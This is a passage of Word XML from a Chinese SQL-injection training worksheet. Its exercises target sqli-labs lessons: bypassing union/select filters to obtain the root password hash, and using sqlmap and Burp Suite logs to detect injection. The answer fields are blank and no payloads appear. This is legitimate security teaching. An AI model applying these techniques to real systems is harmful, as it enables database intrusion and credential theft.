              <w:t>过滤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C345E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C345D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3460" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C345F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过</w:t>
            </w:r>
            <w:r>
              <w:t>union</w:t>
            </w:r>
            <w:r>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:t>过滤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的注入方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3462" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3461" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3465" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3463" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-27b/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3464" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:num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绕过该链接的限制，执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入，查询到数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户的密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3467" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3466" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C346E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3468" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3469" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C346A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C346B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C346C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C346D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C346F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3470" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc21889"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入练习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="059C3471" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc3351"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测是否存在注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3473" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3472" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3475" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3474" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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检测是否存在注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3477" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3476" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3479" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3478" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>检测目标链接是否存在注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C347B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C347A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C347E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C347C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C347D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>检测目标链接是否存在注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3480" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C347F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3487" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3481" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3482" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3483" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3484" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3485" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3486" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3488" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3489" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc31377"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定注入点、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C348B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C348A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C348D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C348C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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指定注入点、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>DBMS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>进行检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C348F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C348E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3491" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3490" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>指定注入点、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>DBMS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>进行检测，减少检测时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3493" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3492" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3496" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3494" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3495" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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lastRenderedPageBreak/>
              <w:t>通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>指定注入点、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>DBMS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>进行检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3498" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3497" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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lastRenderedPageBreak/>
              <w:t>实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C349F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3499" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C349A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C349B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C349C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C349D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C349E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C34A0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C34A1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc12577"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从日志文件发起检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34A3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34A2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34A4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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从日志文件发起检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34A7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34A6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34A9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34A8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>burpsuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>发起</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34AB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34AA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34B0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34AC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34AD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:num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浏览器设置代理指向</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>burpsuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>，访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>目标链接</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34AE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:num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从</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>burpsuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>中复制出请求日志，保存到文件中</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34AF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto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sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>从日志文件发起检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34B2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34B1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34B9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34B3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34B4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
